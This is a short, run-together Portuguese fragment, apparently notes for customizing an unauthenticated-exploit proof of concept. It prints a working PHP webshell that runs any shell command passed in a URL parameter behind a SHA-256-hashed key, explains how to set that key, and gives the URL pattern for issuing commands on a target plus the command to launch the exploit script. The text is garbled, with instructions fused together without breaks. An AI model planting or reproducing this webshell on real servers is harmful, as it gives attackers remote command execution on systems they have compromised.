
Personalizei isso para meu próprio uso
Personalizado para meu próprio uso
?cmd=<comando>YOUR_SECRET_KEY na variável webshell dentro da função drop_payload para o valor hash SHA-256 da chave desejadaYOUR_SECRET_KEY no webshell pelo valor hash SHA-256 da chave em texto claro{target}/shell.php?k=<chave_em_texto_claro>&c=<comando>
echo -n test1234 | sha256sumcyberchef ou similarwebshell = """<?php const K='937e8d5fbb48bd4949536cd65b8d35c426b80d2f830c5c308e2cdec422ae2244';if(hash('sha256',$_GET['k']??'')!==K)die; if(isset($_GET['c']))echo'<pre>'.shell_exec($_GET['c']); ?>"""
python poc_noauth.py {alvo}